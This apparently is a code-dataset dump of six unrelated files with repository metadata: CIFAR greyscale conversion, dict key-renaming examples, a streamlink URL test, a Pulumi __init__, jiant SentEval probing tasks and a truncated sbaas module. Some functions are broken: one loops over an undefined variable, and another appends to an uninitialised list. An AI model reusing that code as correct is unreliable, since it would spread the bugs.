Source/CIFAR/utils.py
|
Theonik/Convnet-demo
|
ba80f65826cca9485c04ac6322bc752232a8b1b6
|
[
"Apache-2.0"
] | null | null | null |
Source/CIFAR/utils.py
|
Theonik/Convnet-demo
|
ba80f65826cca9485c04ac6322bc752232a8b1b6
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from math import sqrt
def convert_set_to_greyscale(cifar_set, method=0, gamma=1.0):
converted_set = np.empty((cifar_set.shape[0], 1, cifar_set.shape[2], cifar_set.shape[3]), 'float32')
for image_index, image in enumerate(cifar_set):
for row_index, row in enumerate(image[0]):
for pixel_index, pixel in enumerate(row):
grey = 0.0
if method == 0: # rec.709 luminance
grey = (0.2126 * cifar_set[image_index, 0, row_index, pixel_index]) + \
(0.7152 * cifar_set[image_index, 1, row_index, pixel_index]) + \
(0.0722 * cifar_set[image_index, 2, row_index, pixel_index])
elif method == 1: # NTSC/W3C luminance
grey = (0.299 * cifar_set[image_index, 0, row_index, pixel_index]) + \
(0.587 * cifar_set[image_index, 1, row_index, pixel_index]) + \
(0.114 * cifar_set[image_index, 2, row_index, pixel_index])
elif method == 2:
grey = sqrt(((0.299 * cifar_set[image_index, 0, row_index, pixel_index]) ** 2) +
((0.587 * cifar_set[image_index, 1, row_index, pixel_index]) ** 2) +
((0.114 * cifar_set[image_index, 2, row_index, pixel_index]) ** 2))
elif method == 3:
grey = sqrt(((0.2126 * cifar_set[image_index, 0, row_index, pixel_index]) ** 2) +
((0.7152 * cifar_set[image_index, 1, row_index, pixel_index]) ** 2) +
((0.0722 * cifar_set[image_index, 2, row_index, pixel_index]) ** 2))
elif method == 4: # Simple mean of RGB intensity
grey = ((cifar_set[image_index, 0, row_index, pixel_index]) +
(cifar_set[image_index, 1, row_index, pixel_index]) +
(cifar_set[image_index, 2, row_index, pixel_index])) / 3
else:
print 'Error: This is not a valid conversion mode.\n Reverting to colour.'
return cifar_set.astype('float32') / 255
converted_set[image_index, 0, row_index, pixel_index] = np.float32(grey/255)
print 'Converted ', len(converted_set), ' images to greyscale.'
return converted_set
def convert_image_to_greyscale(cifar_set, method=0, gamma=1.0):
converted_image = np.empty((1, cifar_set.shape[1], cifar_set.shape[2]), 'float32')
for row_index, row in enumerate(image[0]):
for pixel_index, pixel in enumerate(row):
grey = 0.0
if method == 0: # rec.709 luminance
grey = (0.2126 * cifar_set[0, row_index, pixel_index]) + \
(0.7152 * cifar_set[1, row_index, pixel_index]) + \
(0.0722 * cifar_set[2, row_index, pixel_index])
elif method == 1: # NTSC/W3C luminance
grey = (0.299 * cifar_set[0, row_index, pixel_index]) + \
(0.587 * cifar_set[1, row_index, pixel_index]) + \
(0.114 * cifar_set[2, row_index, pixel_index])
elif method == 2:
grey = sqrt(((0.299 * cifar_set[0, row_index, pixel_index]) ** 2) +
((0.587 * cifar_set[1, row_index, pixel_index]) ** 2) +
((0.114 * cifar_set[2, row_index, pixel_index]) ** 2))
elif method == 3:
grey = sqrt(((0.2126 * cifar_set[0, row_index, pixel_index]) ** 2) +
((0.7152 * cifar_set[1, row_index, pixel_index]) ** 2) +
((0.0722 * cifar_set[2, row_index, pixel_index]) ** 2))
elif method == 4: # Simple mean of RGB
grey = ((cifar_set[0, row_index, pixel_index]) +
(cifar_set[1, row_index, pixel_index]) +
(cifar_set[2, row_index, pixel_index])) / 3
else:
print 'Error: This is not a valid conversion mode.\n Reverting to colour.'
return cifar_set.astype('float32') / 255
converted_image[0, row_index, pixel_index] = np.float32(grey / 255)
return converted_image
| 62.304348
| 104
| 0.531054
| 553
| 4,299
| 3.878843
| 0.122966
| 0.149184
| 0.193939
| 0.268531
| 0.868531
| 0.854545
| 0.854545
| 0.825641
| 0.81958
| 0.685315
| 0
| 0.076731
| 0.348221
| 4,299
| 69
| 105
| 62.304348
| 0.688794
| 0.028146
| 0
| 0.34375
| 0
| 0
| 0.045781
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.03125
| null | null | 0.046875
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
65b938cf609fdca2021e5f09f94aa377807a7c58
| 2,142
|
py
|
Python
|
notebook/dict_change_key.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 174
|
2018-05-30T21:14:50.000Z
|
2022-03-25T07:59:37.000Z
|
notebook/dict_change_key.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 5
|
2019-08-10T03:22:02.000Z
|
2021-07-12T20:31:17.000Z
|
notebook/dict_change_key.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 53
|
2018-04-27T05:26:35.000Z
|
2022-03-25T07:59:37.000Z
|
d = {'k1': 1, 'k2': 2, 'k3': 3}
d['k10'] = d['k1']
del d['k1']
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
d = {'k1': 1, 'k2': 2, 'k3': 3}
print(d.pop('k1'))
# 1
print(d)
# {'k2': 2, 'k3': 3}
d = {'k1': 1, 'k2': 2, 'k3': 3}
d['k10'] = d.pop('k1')
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
d = {'k1': 1, 'k2': 2, 'k3': 3}
# print(d.pop('k10'))
# KeyError: 'k10'
print(d.pop('k10', None))
# None
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3}
def change_dict_key(d, old_key, new_key, default_value=None):
d[new_key] = d.pop(old_key, default_value)
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key(d, 'k1', 'k10')
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key(d, 'k10', 'k100')
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3, 'k100': None}
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key(d, 'k10', 'k100', 100)
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3, 'k100': 100}
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key(d, 'k1', 'k2')
print(d)
# {'k2': 1, 'k3': 3}
def change_dict_key_setdefault(d, old_key, new_key, default_value=None):
d.setdefault(new_key, d.pop(old_key, default_value))
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_setdefault(d, 'k1', 'k2')
print(d)
# {'k2': 2, 'k3': 3}
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_setdefault(d, 'k1', 'k10')
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_setdefault(d, 'k10', 'k100')
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3, 'k100': None}
def change_dict_key_exist(d, old_key, new_key):
if old_key in d:
d[new_key] = d.pop(old_key)
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_exist(d, 'k1', 'k10')
print(d)
# {'k2': 2, 'k3': 3, 'k10': 1}
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_exist(d, 'k10', 'k100')
print(d)
# {'k1': 1, 'k2': 2, 'k3': 3}
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_exist(d, 'k1', 'k2')
print(d)
# {'k2': 1, 'k3': 3}
def change_dict_key_exist_setdefault(d, old_key, new_key):
if old_key in d:
d.setdefault(new_key, d.pop(old_key))
d = {'k1': 1, 'k2': 2, 'k3': 3}
change_dict_key_exist_setdefault(d, 'k1', 'k2')
print(d)
# {'k2': 2, 'k3': 3}
| 20.796117
| 72
| 0.521942
| 415
| 2,142
| 2.539759
| 0.06506
| 0.085389
| 0.132827
| 0.159393
| 0.950664
| 0.93074
| 0.891841
| 0.891841
| 0.858634
| 0.783681
| 0
| 0.137892
| 0.180672
| 2,142
| 102
| 73
| 21
| 0.462678
| 0.216153
| 0
| 0.571429
| 0
| 0
| 0.10006
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0
| 0
| 0.071429
| 0.303571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02b6b7a182395dbb970279f055b75b84fcc0665e
| 1,219
|
py
|
Python
|
tests/plugins/test_ltv_lsm_lv.py
|
hymer-up/streamlink
|
f09bf6e04cddc78eceb9ded655f716ef3ee4b84f
|
[
"BSD-2-Clause"
] | 5
|
2017-03-21T19:43:17.000Z
|
2018-10-03T14:04:29.000Z
|
tests/plugins/test_ltv_lsm_lv.py
|
hymer-up/streamlink
|
f09bf6e04cddc78eceb9ded655f716ef3ee4b84f
|
[
"BSD-2-Clause"
] | 7
|
2016-10-13T23:29:31.000Z
|
2018-06-28T14:04:32.000Z
|
tests/plugins/test_ltv_lsm_lv.py
|
bumplzz69/streamlink
|
34abc43875d7663ebafa241573dece272e93d88b
|
[
"BSD-2-Clause"
] | 2
|
2021-02-09T14:29:21.000Z
|
2021-05-28T11:10:34.000Z
|
import unittest
from streamlink.plugins.ltv_lsm_lv import LtvLsmLv
class TestPluginLtvLsmLv(unittest.TestCase):
def test_can_handle_url(self):
self.assertTrue(LtvLsmLv.can_handle_url("https://ltv.lsm.lv/lv/tieshraide/example/"))
self.assertTrue(LtvLsmLv.can_handle_url("http://ltv.lsm.lv/lv/tieshraide/example/"))
self.assertTrue(LtvLsmLv.can_handle_url("https://ltv.lsm.lv/lv/tieshraide/example/live.123/"))
self.assertTrue(LtvLsmLv.can_handle_url("http://ltv.lsm.lv/lv/tieshraide/example/live.123/"))
def test_can_handle_url_negative(self):
self.assertFalse(LtvLsmLv.can_handle_url("https://ltv.lsm.lv"))
self.assertFalse(LtvLsmLv.can_handle_url("http://ltv.lsm.lv"))
self.assertFalse(LtvLsmLv.can_handle_url("https://ltv.lsm.lv/lv"))
self.assertFalse(LtvLsmLv.can_handle_url("http://ltv.lsm.lv/lv"))
self.assertFalse(LtvLsmLv.can_handle_url("https://ltv.lsm.lv/other-site/"))
self.assertFalse(LtvLsmLv.can_handle_url("http://ltv.lsm.lv/other-site/"))
self.assertFalse(LtvLsmLv.can_handle_url("https://ltv.lsm.lv/lv/other-site/"))
self.assertFalse(LtvLsmLv.can_handle_url("http://ltv.lsm.lv/lv/other-site/"))
| 55.409091
| 102
| 0.724364
| 175
| 1,219
| 4.857143
| 0.165714
| 0.148235
| 0.197647
| 0.282353
| 0.868235
| 0.823529
| 0.812941
| 0.812941
| 0.796471
| 0.796471
| 0
| 0.00552
| 0.108285
| 1,219
| 21
| 103
| 58.047619
| 0.776449
| 0
| 0
| 0
| 0
| 0
| 0.311731
| 0
| 0
| 0
| 0
| 0
| 0.705882
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
02c216866f75efc46d0d664236cd942d9adb4921
| 649
|
py
|
Python
|
sdk/python/pulumi_google_native/containeranalysis/v1alpha1/__init__.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/containeranalysis/v1alpha1/__init__.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/containeranalysis/v1alpha1/__init__.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from ... import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .get_note import *
from .get_note_iam_policy import *
from .get_occurrence import *
from .get_occurrence_iam_policy import *
from .get_provider_note_iam_policy import *
from .note import *
from .note_iam_policy import *
from .occurrence import *
from .occurrence_iam_policy import *
from .provider_note_iam_policy import *
from ._inputs import *
from . import outputs
| 30.904762
| 80
| 0.768875
| 98
| 649
| 4.867347
| 0.44898
| 0.251572
| 0.188679
| 0.238994
| 0.360587
| 0.129979
| 0
| 0
| 0
| 0
| 0
| 0.001815
| 0.151002
| 649
| 20
| 81
| 32.45
| 0.863884
| 0.312789
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
02de662220a766e589d3bc5ef62b920d69c494c2
| 18,235
|
py
|
Python
|
jiant/tasks/senteval_probing.py
|
pitrack/jiant
|
787e78baa50e4b6eb19f809934d161cab31a2c7d
|
[
"MIT"
] | null | null | null |
jiant/tasks/senteval_probing.py
|
pitrack/jiant
|
787e78baa50e4b6eb19f809934d161cab31a2c7d
|
[
"MIT"
] | null | null | null |
jiant/tasks/senteval_probing.py
|
pitrack/jiant
|
787e78baa50e4b6eb19f809934d161cab31a2c7d
|
[
"MIT"
] | null | null | null |
"""
Set of probing tasks that were added to Senteval Probing.
Paper: https://arxiv.org/abs/1805.01070
"""
import collections
import itertools
import json
import logging as log
import os
import numpy as np
import pandas as pd
import torch
# Fields for instance processing
from jiant.utils.data_loaders import tokenize_and_truncate
from jiant.tasks.registry import register_task # global task registry
from jiant.tasks.tasks import SingleClassificationTask, process_single_pair_task_split
@register_task("se-probing-sentence-length", rel_path="sentence_length/")
class SEProbingSentenceLengthTask(SingleClassificationTask):
""" Sentence length task """
def __init__(self, path, max_seq_len, name, **kw):
""" """
super(SEProbingSentenceLengthTask, self).__init__(name, n_classes=7, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return [str(x) for x in list(range(6))]
def get_sentences(self):
return self.sentences
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
rows = rows.sample(frac=1, axis=0).reset_index(drop=True)
rows["s1"] = rows["2"].apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
return rows["s1"].tolist(), [], rows["1"].tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
@register_task("se-probing-bigram-shift", rel_path="bigram_shift/")
class SEProbingBigramShiftTask(SingleClassificationTask):
""" Bigram shift task """
def __init__(self, path, max_seq_len, name, **kw):
""" """
super(SEProbingBigramShiftTask, self).__init__(name, n_classes=2, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return ["I", "O"]
def get_sentences(self):
return self.sentences
def process_split(self, split, indexers, model_preprocessing_interface):
return process_single_pair_task_split(
split,
indexers,
model_preprocessing_interface,
label_namespace=self._label_namespace,
is_pair=False,
skip_indexing=False,
)
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
rows["s1"] = rows["2"].apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
return rows["s1"].tolist(), [], rows["1"].tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
@register_task("se-probing-past-present", rel_path="past_present/")
class SEProbingPastPresentTask(SingleClassificationTask):
""" Past Present Task """
def __init__(self, path, max_seq_len, name, **kw):
""" """
super(SEProbingPastPresentTask, self).__init__(name, n_classes=2, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return ["PAST", "PRES"]
def get_sentences(self):
return self.sentences
def process_split(self, split, indexers, model_preprocessing_interface):
return process_single_pair_task_split(
split,
indexers,
model_preprocessing_interface,
label_namespace=self._label_namespace,
is_pair=False,
skip_indexing=False,
)
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
rows["s1"] = rows["2"].apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
return rows["s1"].tolist(), [], rows["1"].tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
@register_task("se-probing-odd-man-out", rel_path="odd_man_out/")
class SEProbingOddManOutTask(SingleClassificationTask):
""" Odd man out task """
def __init__(self, path, max_seq_len, name, **kw):
""" """
super(SEProbingOddManOutTask, self).__init__(name, n_classes=2, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return ["C", "O"]
def process_split(self, split, indexers, model_preprocessing_interface):
return process_single_pair_task_split(
split,
indexers,
model_preprocessing_interface,
label_namespace=self._label_namespace,
is_pair=False,
skip_indexing=False,
)
def get_sentences(self):
return self.sentences
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
rows["s1"] = rows["2"].apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
return rows["s1"].tolist(), [], rows["1"].tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
@register_task("se-probing-coordination-inversion", rel_path="coordination_inversion/")
class SEProbingCoordinationInversionTask(SingleClassificationTask):
""" Coordination Inversion task. """
def __init__(self, path, max_seq_len, name, **kw):
""" """
super(SEProbingCoordinationInversionTask, self).__init__(name, n_classes=2, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return ["O", "I"]
def get_sentences(self):
return self.sentences
def process_split(self, split, indexers, model_preprocessing_interface):
return process_single_pair_task_split(
split,
indexers,
model_preprocessing_interface,
label_namespace=self._label_namespace,
is_pair=False,
skip_indexing=False,
)
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
rows["s1"] = rows["2"].apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
return rows["s1"].tolist(), [], rows["1"].tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
@register_task("se-probing-word-content", rel_path="word_content")
class SEProbingWordContentTask(SingleClassificationTask):
""" Word Content Task """
def __init__(self, path, max_seq_len, name, **kw):
super(SEProbingWordContentTask, self).__init__(name, n_classes=1000, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return list(set(self.labels))
def get_sentences(self):
return self.sentences
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
rows["s1"] = rows["2"].apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
self.labels.append(rows["1"].tolist())
return rows["s1"].tolist(), [], rows["1"].tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
@register_task("se-probing-tree-depth", rel_path="tree_depth")
class SEProbingTreeDepthTask(SingleClassificationTask):
""" Tree Depth Task """
def __init__(self, path, max_seq_len, name, **kw):
""" """
super(SEProbingTreeDepthTask, self).__init__(name, n_classes=8, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return [str(x) for x in list(range(8))]
def get_sentences(self):
return self.sentences
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
labels = rows["1"].apply(lambda x: int(x.split("\t")[0]))
labels = labels.apply(lambda x: x - 5)
s1 = rows["1"].apply(lambda x: x.split("\t")[1])
s1 = s1.apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
return s1.tolist(), [], labels.tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
@register_task("se-probing-top-constituents", rel_path="top_constituents/")
class SEProbingTopConstituentsTask(SingleClassificationTask):
""" Top Constituents task """
def __init__(self, path, max_seq_len, name, **kw):
""" """
super(SEProbingTopConstituentsTask, self).__init__(name, n_classes=20, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return self.labels
def process_split(self, split, indexers, model_preprocessing_interface):
return process_single_pair_task_split(
split,
indexers,
model_preprocessing_interface,
label_namespace=self._label_namespace,
is_pair=False,
skip_indexing=False,
)
def get_sentences(self):
return self.sentences
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
labels = rows["1"].apply(lambda x: str(x.split("\t")[0]))
self.labels = list(set(labels.tolist()))
s1 = rows["1"].apply(lambda x: x.split("\t")[1])
s1 = s1.apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
return s1.tolist(), [], labels.tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
@register_task("se-probing-subj-number", rel_path="subj_number")
class SEProbingSubjNumberTask(SingleClassificationTask):
""" Subject number task """
def __init__(self, path, max_seq_len, name, **kw):
super(SEProbingSubjNumberTask, self).__init__(name, n_classes=2, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return ["NN", "NNS"]
def process_split(self, split, indexers, model_preprocessing_interface):
return process_single_pair_task_split(
split,
indexers,
model_preprocessing_interface,
label_namespace=self._label_namespace,
is_pair=False,
skip_indexing=False,
)
def get_sentences(self):
return self.sentences
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
labels = rows["1"].apply(lambda x: str(x.split("\t")[0]))
s1 = rows["1"].apply(lambda x: x.split("\t")[1])
s1 = s1.apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
return s1.tolist(), [], labels.tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
@register_task("se-probing-obj-number", rel_path="obj_number")
class SEProbingObjNumberTask(SingleClassificationTask):
""" Object number task """
def __init__(self, path, max_seq_len, name, **kw):
super(SEProbingObjNumberTask, self).__init__(name, n_classes=2, **kw)
self.path = path
self.max_seq_len = max_seq_len
self._label_namespace = self.name + "_tags"
self.train_data_text = None
self.val_data_text = None
self.test_data_text = None
def get_all_labels(self):
return ["NN", "NNS"]
def process_split(self, split, indexers, model_preprocessing_interface):
return process_single_pair_task_split(
split,
indexers,
model_preprocessing_interface,
label_namespace=self._label_namespace,
is_pair=False,
skip_indexing=False,
)
def get_sentences(self):
return self.sentences
def load_data(self):
""" Load data """
def load_csv(data_file):
rows = pd.read_csv(data_file, encoding="utf-8")
labels = rows["1"].apply(lambda x: str(x.split("\t")[0]))
s1 = rows["1"].apply(lambda x: x.split("\t")[1])
s1 = s1.apply(
lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
)
return s1.tolist(), [], labels.tolist(), list(range(len(rows)))
self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
sentences = []
for split in ["train", "val", "test"]:
split_data = getattr(self, "%s_data_text" % split)
sentences.extend(split_data[0])
self.sentences = sentences
| 35.895669
| 90
| 0.614807
| 2,315
| 18,235
| 4.562851
| 0.070842
| 0.053015
| 0.034081
| 0.042602
| 0.83073
| 0.820695
| 0.820695
| 0.820695
| 0.820695
| 0.820695
| 0
| 0.007742
| 0.256265
| 18,235
| 507
| 91
| 35.966469
| 0.771125
| 0.026049
| 0
| 0.81117
| 0
| 0
| 0.059329
| 0.015017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151596
| false
| 0
| 0.029255
| 0.071809
| 0.305851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f307927fa7c7cd2cabaa9562cafd666cfea4847d
| 206,915
|
py
|
Python
|
sbaas/analysis/analysis_stage01_isotopomer/stage01_isotopomer_execute.py
|
SBRG/sbaas
|
9df76bbffdd620cf8566744a2b0503935998fbe0
|
[
"Apache-2.0"
] | 1
|
2017-05-13T04:35:08.000Z
|
2017-05-13T04:35:08.000Z
|
sbaas/analysis/analysis_stage01_isotopomer/stage01_isotopomer_execute.py
|
SBRG/sbaas
|
9df76bbffdd620cf8566744a2b0503935998fbe0
|
[
"Apache-2.0"
] | null | null | null |
sbaas/analysis/analysis_stage01_isotopomer/stage01_isotopomer_execute.py
|
SBRG/sbaas
|
9df76bbffdd620cf8566744a2b0503935998fbe0
|
[
"Apache-2.0"
] | 2
|
2017-02-23T19:32:38.000Z
|
2020-01-14T19:13:05.000Z
|
'''quantitative metabolomics analysis class'''
from sbaas.analysis.analysis_base import *
from .stage01_isotopomer_query import *
from .stage01_isotopomer_io import *
from sbaas.resources.molmass import Formula
from sbaas.resources.matplot import matplot
import re,copy
from scipy.stats import mode
from scipy.io import savemat
class stage01_isotopomer_execute():
'''class for quantitative metabolomics analysis'''
def __init__(self, session_I=None):
if session_I: self.session = session_I;
else: self.session = Session();
self.stage01_isotopomer_query = stage01_isotopomer_query(self.session);
self.calculate = base_calculate();
self.isotopomer_13C_fragments_validated = {'23dpg':['C3H7O10P2-'],
'6pgc':['C6H12O10P-','C6H10O9P-','C5H12O7P-'],
